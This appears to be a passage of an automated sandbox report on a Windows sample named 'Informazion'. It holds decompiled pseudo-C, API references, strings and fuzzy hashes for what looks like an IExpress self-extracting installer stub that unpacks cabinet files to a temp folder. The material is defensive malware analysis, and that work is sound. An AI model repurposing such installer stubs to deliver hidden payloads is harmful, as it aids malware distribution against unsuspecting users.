				if ( *((intOrPtr*)( *((intOrPtr*)(_t108 + 8)) + _t105)) != sil) goto 0x4c515a51;
				if ( *((intOrPtr*)(0x4c51d610 + _t154 + 1)) != sil) goto 0x4c515a64;
				if (_t52 + 1 + ( *(_t108 + 0x30) & 0x0000ffff) - 0x104 >= 0) goto 0x4c5158fc;
				if (E00007FF67FF64C51512C(_t105, _t108, _t143 - 0x150 + 0x30, 0x4c51d610, _t138,  *((intOrPtr*)(_t108 + 8))) == 0) goto 0x4c5158fc;
				_t56 = E00007FF67FF64C5151BC(_t105, _t108, _t143 - 0x150 + 0x30); // executed
				if (_t56 == 0) goto 0x4c515924;
				r8d = 0x180; // executed
				E00007FF67FF64C515380(0x8302, __ebp, _t108, _t143 - 0x150 + 0x30, 0x4c51d610,  *(_t108 + 0x28) << 5, _t138, _t98 - 0x68); // executed
				if (_t105 == _t154) goto 0x4c5158fc;
				if (E00007FF67FF64C51527C(_t105, _t105, _t144 + 0x30, 0x4c51d610, _t138,  *((intOrPtr*)(_t108 + 8)), _t144 + 0x20) == 0) goto 0x4c5158fc;
				 *0x4c51d820 =  *0x4c51d820 + 1;
				goto 0x4c515ae8;
				E00007FF67FF64C515B18(E00007FF67FF64C51527C(_t105, _t105, _t144 + 0x30, 0x4c51d610, _t138,  *((intOrPtr*)(_t108 + 8)), _t144 + 0x20), _t105,  *((intOrPtr*)(_t108 + 8)));
				return E00007FF67FF64C518470(_t105,  *(_t108 + 0x30) & 0x0000ffff,  *(_t98 - 0x68 + 0x40) ^ _t144);
			}

0x7ff64c5158b0
0x7ff64c5158b0
0x7ff64c5158b0
0x7ff64c5158b3
0x7ff64c5158b7
0x7ff64c5158bb
0x7ff64c5158c8
0x7ff64c5158cf
0x7ff64c5158d9
0x7ff64c5158dd
0x7ff64c5158e3
0x7ff64c5158e9
0x7ff64c5158ec
0x7ff64c5158f1
0x7ff64c5158f7
0x7ff64c5158ff
0x7ff64c515904
0x7ff64c515906
0x7ff64c51590f
0x7ff64c515914
0x7ff64c51591a
0x7ff64c51591d
0x7ff64c515922
0x7ff64c515926
0x7ff64c515939
0x7ff64c51594c
0x7ff64c515957
0x7ff64c515965
0x7ff64c51597c
0x7ff64c51599d
0x7ff64c5159bb
0x7ff64c5159d5
0x7ff64c5159e3
0x7ff64c5159ed
0x7ff64c5159f6
0x7ff64c5159fd
0x7ff64c515a0b
0x7ff64c515a19
0x7ff64c515a24
0x7ff64c515a29
0x7ff64c515a33
0x7ff64c515a3e
0x7ff64c515a51
0x7ff64c515a58
0x7ff64c515a6b
0x7ff64c515a76
0x7ff64c515a88
0x7ff64c515a93
0x7ff64c515a9a
0x7ff64c515aaa
0x7ff64c515ab0
0x7ff64c515abb
0x7ff64c515acd
0x7ff64c515ad3
0x7ff64c515adc
0x7ff64c515ae1
0x7ff64c515b10

APIs

DosDateTimeToFileTime.KERNEL32 ref: 00007FF64C51598F
LocalFileTimeToFileTime.KERNEL32 ref: 00007FF64C5159AD
SetFileTime.KERNELBASE ref: 00007FF64C5159D5
SetFileAttributesA.KERNELBASE ref: 00007FF64C515A0B
SetDlgItemTextA.USER32 ref: 00007FF64C515A3E

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF64C51593B, 00007FF64C515A5A

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: FileTime$AttributesDateItemLocalText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 851750970-305352358
Opcode ID: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
Instruction ID: 61a205120261631c02498d0296a9049e46d9828d4f1866bed9604c9200e351a0
Opcode Fuzzy Hash: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
Instruction Fuzzy Hash: D3518122E1CA4291EB69BF29D4581BD6BA0FB48B90FD44133D96EC3395CE3CE965C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C516B70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF67FF64C516B70(void* __ebx, void* __rax, signed int __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				signed int _v32;
				intOrPtr _v40;
				signed int _t11;
				void* _t40;
				void* _t41;
				void* _t42;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				if ( *((char*)(__rcx + (__rbx | 0xffffffff) + 1)) != 0) goto 0x4c516b8b;
				_t11 = LocalAlloc(??, ??);
				if (__rax != 0) goto 0x4c516bf5;
				_v32 = _v32 & _t11;
				r9d = 0;
				r8d = 0;
				_v40 = 0x10;
				E00007FF67FF64C514DCC(__rcx, _t40, _t41, _t42);
				 *0x4c51d544 = E00007FF67FF64C517700();
				return 0;
			}

0x7ff64c516b70
0x7ff64c516b75
0x7ff64c516b7a
0x7ff64c516b92
0x7ff64c516ba0
0x7ff64c516bb2
0x7ff64c516bb4
0x7ff64c516bb8
0x7ff64c516bbb
0x7ff64c516bbe
0x7ff64c516bcd
0x7ff64c516bd7
0x7ff64c516bf3

APIs

LocalAlloc.KERNEL32 ref: 00007FF64C516BA0

Strings

TMP4351$.TMP, xrefs: 00007FF64C516C03

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: AllocLocal
String ID: TMP4351$.TMP
API String ID: 3494564517-2619824408
Opcode ID: d5ace99f2663905ba72166a92556dafad1272f0db083ef97e46a8f7b12bd3ef1
Instruction ID: 21dae51203d2d1a4394e8650741604338976ce09c15de3a0cdaafe45ae6d18d6
Opcode Fuzzy Hash: d5ace99f2663905ba72166a92556dafad1272f0db083ef97e46a8f7b12bd3ef1
Instruction Fuzzy Hash: 5B314E21E0C68186E718BF29A41837EBE50EB85BB5F445336DA7A467D5CF3CD9258600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C515C60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

#20.CABINET ref: 00007FF64C515CD9
#21.CABINET ref: 00007FF64C515D18
#23.CABINET ref: 00007FF64C515D52

Strings

*MEMCAB, xrefs: 00007FF64C515CF2

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID:
String ID: *MEMCAB
API String ID: 0-3211172518
Opcode ID: 2085e244be9a75c0329170706bb6144b0415b504333b66df14c927118817c01a
Instruction ID: 43633deaa25af07c198bfe21678e61e1f60241583e197f7d3d277bff3393f571
Opcode Fuzzy Hash: 2085e244be9a75c0329170706bb6144b0415b504333b66df14c927118817c01a
Instruction Fuzzy Hash: EB313825E1CB4285EA18BF29E44C2AD7BA0BB44790F954237D96D82394EF3CE5A9C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C515690 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64C513B40: MsgWaitForMultipleObjects.USER32 ref: 00007FF64C513B64
Part of subcall function 00007FF64C513B40: PeekMessageA.USER32 ref: 00007FF64C513B89
Part of subcall function 00007FF64C513B40: PeekMessageA.USER32 ref: 00007FF64C513BCD

WriteFile.KERNELBASE ref: 00007FF64C5156E4

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: 2a76a806002c51afc5401a5001571f8213dae6f688e945ba72fdbdbea0bf890e
Instruction ID: 03b55c7d951df62b4f9a6e9b46785cb7591a73bcb615f4acc6a1717bd84a0c54
Opcode Fuzzy Hash: 2a76a806002c51afc5401a5001571f8213dae6f688e945ba72fdbdbea0bf890e
Instruction Fuzzy Hash: FA218E20E1C64286E718FF19E848739BBA0FB84B94F548236D97D867A4DF3CE424CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C5151BC Relevance: 3.0, APIs: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E00007FF67FF64C5151BC(void* __rax, long long __rbx, long long __rcx, long long _a8) {
				long long _v16;
				long long _v24;
				long _t8;
				void* _t20;
				intOrPtr _t21;
				signed int _t22;
				void* _t24;
				void* _t32;
				void* _t33;
				intOrPtr _t37;

				_t24 = __rax;
				_a8 = __rbx;
				_t8 = GetFileAttributesA(??); // executed
				_t20 = _t8 - 0xffffffff;
				if (_t20 == 0) goto 0x4c515263;
				if (_t20 == 0) goto 0x4c515263;
				_t21 =  *0x4c51d600; // 0x0
				if (_t21 != 0) goto 0x4c515246;
				_t22 =  *0x4c51cd18 & 0x00000001;
				if (_t22 != 0) goto 0x4c515246;
				_t37 =  *0x4c51c828; // 0x0
				_v16 = 6;
				_v24 = __rbx;
				 *0x4c51d830 = __rcx;
				E00007FF67FF64C517AC8(__rax, __rbx, _t32, _t33, _t37, 0x7ff64c513840);
				if (_t22 == 0) goto 0x4c515246;
				if (_t22 == 0) goto 0x4c51525f;
				if (_t24 - 5 != 0x832) goto 0x4c515246;
				 *0x4c51d600 = 1;
				SetFileAttributesA(??, ??);
				goto 0x4c515268;
				return 1;
			}

0x7ff64c5151bc
0x7ff64c5151bc
0x7ff64c5151c9
0x7ff64c5151d5
0x7ff64c5151d8
0x7ff64c5151e6
0x7ff64c5151ea
0x7ff64c5151f0
0x7ff64c5151f2
0x7ff64c5151f9
0x7ff64c5151fb
0x7ff64c515209
0x7ff64c515217
0x7ff64c51521c
0x7ff64c515223
0x7ff64c51522c
0x7ff64c515232
0x7ff64c51523a
0x7ff64c51523c
0x7ff64c51524e
0x7ff64c515261
0x7ff64c515272

APIs

GetFileAttributesA.KERNELBASE ref: 00007FF64C5151C9
SetFileAttributesA.KERNEL32 ref: 00007FF64C51524E

Part of subcall function 00007FF64C517AC8: FindResourceA.KERNEL32 ref: 00007FF64C517AF2
Part of subcall function 00007FF64C517AC8: LoadResource.KERNEL32 ref: 00007FF64C517B09
Part of subcall function 00007FF64C517AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF64C517B3F
Part of subcall function 00007FF64C517AC8: FreeResource.KERNEL32 ref: 00007FF64C517B51

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 2018477427-0
Opcode ID: ded777603aae7cf846a654b588ac2905db21abed33c2a04ac96d39e62aa9a68d
Instruction ID: 0e453b8ad801322d7a998c60b22a9df97e99dbcd5cbb637cb4187337fac1ca54
Opcode Fuzzy Hash: ded777603aae7cf846a654b588ac2905db21abed33c2a04ac96d39e62aa9a68d
Instruction Fuzzy Hash: A1115E32D0C64282F7597F18A58C37D6EA0EB45758F584232D97D867A5CF7DE8A5C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C517BA8 Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00007FF67FF64C517BA8(void* __edx, char* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, signed int __r8, long long _a8, long long _a16, long long _a24) {
				char* _t23;
				void* _t42;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t42 = (__r8 | 0xffffffff) + 1;
				if ( *((char*)(__rcx + _t42)) != 0) goto 0x4c517bc8;
				if (_t42 + 1 - __edx < 0) goto 0x4c517be1;
				goto 0x4c517c21;
				_t23 = __rbx + __rcx;
				if (_t23 - __rcx <= 0) goto 0x4c517c06;
				CharPrevA(??, ??); // executed
				if ( *__rax == 0x5c) goto 0x4c517c06;
				 *_t23 = 0x5c;
				 *((char*)(_t23 + 1)) = 0;
				goto 0x4c517c0e;
				if ( *((char*)(__r8 + 1)) == 0x20) goto 0x4c517c0b;
				return E00007FF67FF64C511084(__rcx, __rbp, __r8 + 1);
			}

0x7ff64c517ba8
0x7ff64c517bad
0x7ff64c517bb2
0x7ff64c517bc8
0x7ff64c517bd0
0x7ff64c517bd8
0x7ff64c517bdf
0x7ff64c517be4
0x7ff64c517bea
0x7ff64c517bef
0x7ff64c517bfe
0x7ff64c517c00
0x7ff64c517c06
0x7ff64c517c09
0x7ff64c517c11
0x7ff64c517c35

APIs

CharPrevA.USER32 ref: 00007FF64C517BEF

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
Instruction ID: 23942a27a11cd22b2614973909655b90c13ec9975b0bf0f418cb649c2620c03e
Opcode Fuzzy Hash: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
Instruction Fuzzy Hash: F6010411D0C6C186F3057F1DA84826DBE90A745BE4F689271DB79477C6CF2CD4A28B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C515770 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 00007FF64C5157A9

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
Instruction ID: e323578100aeaeed4924e080735d258c9b0e8c2a1e53cdf00c18c1c2e5d9f192
Opcode Fuzzy Hash: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
Instruction Fuzzy Hash: 68F01231A0C782D2DB1CAF29F58517C7A60EB48B98F544636DA3B86784CF78D491C710

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF64C512DB4 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 179
synchronizationCOMMONCrypto

Download Yara Rule

C-Code - Quality: 47%

			E00007FF67FF64C512DB4(long long __rbx, long long __rcx, void* __rdx, long long _a24) {
				signed int _v40;
				char _v312;
				signed int _v320;
				long long _v328;
				void* __rdi;
				void* __rsi;
				void* __r14;
				void* _t36;
				signed char _t42;
				void* _t62;
				void* _t90;
				signed long long _t101;
				signed long long _t102;
				long long _t104;
				void* _t128;
				void* _t130;
				void* _t131;
				void* _t132;
				void* _t135;
				void* _t138;
				void* _t140;
				void* _t141;
				void* _t142;

				_a24 = __rbx;
				_t101 =  *0x4c51c008; // 0xdeba5460e397
				_t102 = _t101 ^ _t132 - 0x00000150;
				_v40 = _t102;
				_t130 = __rdx;
				 *0x4c51de70 = __rcx;
				_t104 = __rcx;
				r8d = 0x910;
				0x4c518b09();
				r8d = 0x32c;
				memset(??, ??, ??);
				r8d = 0x104;
				memset(??, ??, ??);
				_t3 = _t128 + 1; // 0x1
				r14d = _t3;
				_t4 = _t128 + 0x7f; // 0x7f
				r8d = _t4;
				 *0x4c51d818 = r14d;
				_t36 = E00007FF67FF64C515050(_t102, __rcx, "TITLE", 0x4c51d578, __rdx, _t131);
				r9d = 0;
				if (_t36 - 1 - 0x7f > 0) goto 0x4c5130a5;
				r8d = r14d;
				CreateEventA(??, ??, ??, ??);
				 *0x4c51c838 = _t102;
				SetEvent(??);
				_t5 = _t128 + 4; // 0x4
				r8d = _t5;
				if (E00007FF67FF64C515050(_t102, _t104, "EXTRACTOPT", 0x4c51de64, _t130, _t131) != 0) goto 0x4c512ec3;
				_v320 = _v320 & 0;
				r9d = 0;
				r8d = 0;
				_v328 = 0x10;
				E00007FF67FF64C514DCC("EXTRACTOPT", _t135, _t138, _t140);
				 *0x4c51d544 = 0x80070714;
				goto 0x4c5130be;
				_t42 =  *0x4c51de64; // 0x1
				if ((_t42 & 0x00000040) != 0) goto 0x4c512ed5;
				if (_t42 >= 0) goto 0x4c512fa3;
				r8d = 0x104;
				if (E00007FF67FF64C515050(_t102, _t104, "INSTANCECHECK",  &_v312, _t130, _t131) != 0) goto 0x4c512efe;
				_v320 = _v320 & 0;
				r9d = 0;
				r8d = 0;
				goto 0x4c512ea2;
				CreateMutexA(??, ??, ??);
				 *0x4c51c830 = _t102;
				if (_t102 == 0) goto 0x4c512fa3;
				if (GetLastError() != 0xb7) goto 0x4c512fa3;
				r9d = 0;
				if (( *0x4c51de64 & 0x00000080) == 0) goto 0x4c512f62;
				_v320 = _v320 & 0;
				_v328 = 0x10;
				E00007FF67FF64C514DCC("INSTANCECHECK", 0x4c51d578, _t138, _t140);
				goto 0x4c512f81;
				_v320 = 4;
				_v328 = 0x20;
				if (E00007FF67FF64C514DCC("INSTANCECHECK", 0x4c51d578, _t138, _t140) == 6) goto 0x4c512fa3;
				CloseHandle(??);
				 *0x4c51d544 = 0x800700b7;
				goto 0x4c5130be;
				 *0x4c51d540 =  *0x4c51d540 & 0;
				if (E00007FF67FF64C5170A8(_t62, _t104, _t130, _t128, _t130, _t141) != 0) goto 0x4c512fc4;
				r9d = 0;
				goto 0x4c5130aa;
				_t90 =  *0x4c51cd1a - dil; // 0x0
				if (_t90 == 0) goto 0x4c512fde;
				E00007FF67FF64C51204C(_t104, 0x4c51cd1a,  &_v312, _t130);
				goto 0x4c5130be;
				r8d = 0xa;
				FindResourceA(??, ??, ??);
				if (_t102 == 0) goto 0x4c513014;
				LoadResource(??, ??);
				if ( *0x4c51c1ac == 0) goto 0x4c513029;
				__imp__#17();
				if ( *0x4c51cd04 == 0) goto 0x4c51303a;
				goto 0x4c5130c0;
				if (E00007FF67FF64C513BF4(_t104, _t102, _t102, _t102, _t130, _t141) == 0) goto 0x4c5130be;
				if (( *0x4c51de78 & 0x0000ffff) - r14w - 2 > 0) goto 0x4c513032;
				if (( *0x4c51de64 & 0x00000100) == 0) goto 0x4c513032;
				if (( *0x4c51cd18 & r14b) != 0) goto 0x4c513032;
				if (E00007FF67FF64C5112EC(0, 0x520, _t104, _t102, _t102, _t130, 0x4c51d578, _t142) != 0) goto 0x4c513032;
				_v320 = 0x83e;
				r8d = 0;
				_v328 = 0x547;
				E00007FF67FF64C517AC8(_t102, _t104, _t130, _t131, 0x4c51d578, 0x7ff64c511500);
				if (_t102 != 0x83d) goto 0x4c5130be;
				goto 0x4c513032;
				_v320 = _v320 & 0;
				r8d = 0;
				_v328 = 0x10;
				E00007FF67FF64C514DCC(_t102, 0x4c51d578, 0x7ff64c511500, _t140);
				return E00007FF67FF64C518470(0, 0, _v40 ^ _t132 - 0x00000150);
			}

0x7ff64c512db4
0x7ff64c512dc4
0x7ff64c512dcb
0x7ff64c512dce
0x7ff64c512dd6
0x7ff64c512dd9
0x7ff64c512de0
0x7ff64c512dec
0x7ff64c512df4
0x7ff64c512e02
0x7ff64c512e08
0x7ff64c512e16
0x7ff64c512e1c
0x7ff64c512e21
0x7ff64c512e21
0x7ff64c512e25
0x7ff64c512e25
0x7ff64c512e29
0x7ff64c512e3e
0x7ff64c512e45
0x7ff64c512e4d
0x7ff64c512e53
0x7ff64c512e59
0x7ff64c512e68
0x7ff64c512e6f
0x7ff64c512e7b
0x7ff64c512e7b
0x7ff64c512e94
0x7ff64c512e96
0x7ff64c512e9a
0x7ff64c512e9d
0x7ff64c512ea7
0x7ff64c512eaf
0x7ff64c512eb4
0x7ff64c512ebe
0x7ff64c512ec3
0x7ff64c512ecb
0x7ff64c512ecf
0x7ff64c512ed5
0x7ff64c512ef0
0x7ff64c512ef2
0x7ff64c512ef6
0x7ff64c512ef9
0x7ff64c512efc
0x7ff64c512f06
0x7ff64c512f12
0x7ff64c512f1c
0x7ff64c512f33
0x7ff64c512f35
0x7ff64c512f48
0x7ff64c512f4a
0x7ff64c512f53
0x7ff64c512f5b
0x7ff64c512f60
0x7ff64c512f62
0x7ff64c512f6f
0x7ff64c512f7f
0x7ff64c512f88
0x7ff64c512f94
0x7ff64c512f9e
0x7ff64c512fa3
0x7ff64c512fb3
0x7ff64c512fb5
0x7ff64c512fbf
0x7ff64c512fc4
0x7ff64c512fcb
0x7ff64c512fd4
0x7ff64c512fd9
0x7ff64c512fde
0x7ff64c512fee
0x7ff64c512ffd
0x7ff64c513005
0x7ff64c51301b
0x7ff64c51301d
0x7ff64c513030
0x7ff64c513035
0x7ff64c513044
0x7ff64c513055
0x7ff64c513061
0x7ff64c51306a
0x7ff64c513073
0x7ff64c513075
0x7ff64c513085
0x7ff64c513088
0x7ff64c513096
0x7ff64c5130a1
0x7ff64c5130a3
0x7ff64c5130aa
0x7ff64c5130ae
0x7ff64c5130b1
0x7ff64c5130b9
0x7ff64c5130e3

APIs

memset.MSVCRT ref: 00007FF64C512E08
memset.MSVCRT ref: 00007FF64C512E1C

Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C515078
Part of subcall function 00007FF64C515050: SizeofResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C515089
Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C5150AF
Part of subcall function 00007FF64C515050: LoadResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150C0
Part of subcall function 00007FF64C515050: LockResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150CF
Part of subcall function 00007FF64C515050: memcpy_s.MSVCRT ref: 00007FF64C5150EE
Part of subcall function 00007FF64C515050: FreeResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150FD

CreateEventA.KERNEL32 ref: 00007FF64C512E59
SetEvent.KERNEL32 ref: 00007FF64C512E6F
CreateMutexA.KERNEL32 ref: 00007FF64C512F06
GetLastError.KERNEL32 ref: 00007FF64C512F22
FindResourceA.KERNEL32 ref: 00007FF64C512FEE
LoadResource.KERNEL32 ref: 00007FF64C513005

Part of subcall function 00007FF64C513BF4: GetVersionExA.KERNEL32 ref: 00007FF64C513C3F

#17.COMCTL32 ref: 00007FF64C51301D
CloseHandle.KERNEL32 ref: 00007FF64C512F88

Part of subcall function 00007FF64C514DCC: LoadStringA.USER32 ref: 00007FF64C514E60
Part of subcall function 00007FF64C514DCC: MessageBoxA.USER32 ref: 00007FF64C514EA0

Strings

VERCHECK, xrefs: 00007FF64C512FE4
EXTRACTOPT, xrefs: 00007FF64C512E86
TITLE, xrefs: 00007FF64C512E37
, xrefs: 00007FF64C512F6F
INSTANCECHECK, xrefs: 00007FF64C512EE0
Maintal, xrefs: 00007FF64C512E30, 00007FF64C512F38

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
String ID: $EXTRACTOPT$INSTANCECHECK$Maintal$TITLE$VERCHECK
API String ID: 3100096412-578564683
Opcode ID: cf8a1d479714e7ed34faaa90c85d6102251d189b7b9a7dba6c65d19b03d87f13
Instruction ID: 289d9bc341b17821e0ca411c9053ae494b5d789cf5dd4c2dc68fe282bf58a24c
Opcode Fuzzy Hash: cf8a1d479714e7ed34faaa90c85d6102251d189b7b9a7dba6c65d19b03d87f13
Instruction Fuzzy Hash: D6818931E1C6428AF728BF18A8587BD3EA0AF84784F404137D96EC27A5CF7CA525CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C513530 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 174
windowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 44%

			E00007FF67FF64C513530(void* __edx, void* __eflags, signed long long __rax, long long __rbx, void* __rcx, long long __rdi, long long __rbp, void* __r8, void* __r9, long long _a16, long long _a24, long long _a32) {
				signed int _v16;
				signed long long _v24;
				char _t29;
				signed int _t32;
				void* _t46;
				void* _t69;
				void* _t87;
				signed long long _t89;
				void* _t91;
				long long _t93;
				void* _t117;
				void* _t119;
				void* _t135;
				void* _t136;
				void* _t137;

				_t135 = __r9;
				_t93 = __rbx;
				_t89 = __rax;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rdi;
				r15d = 0x10;
				_t117 = __rcx;
				if (__eflags == 0) goto 0x4c513802;
				_t46 = _t137 - 0xf;
				if (__eflags == 0) goto 0x4c51377e;
				_t69 = __edx - r15d - 0x100 - _t46;
				if (_t69 == 0) goto 0x4c513572;
				goto 0x4c513815;
				if (_t69 == 0) goto 0x4c513635;
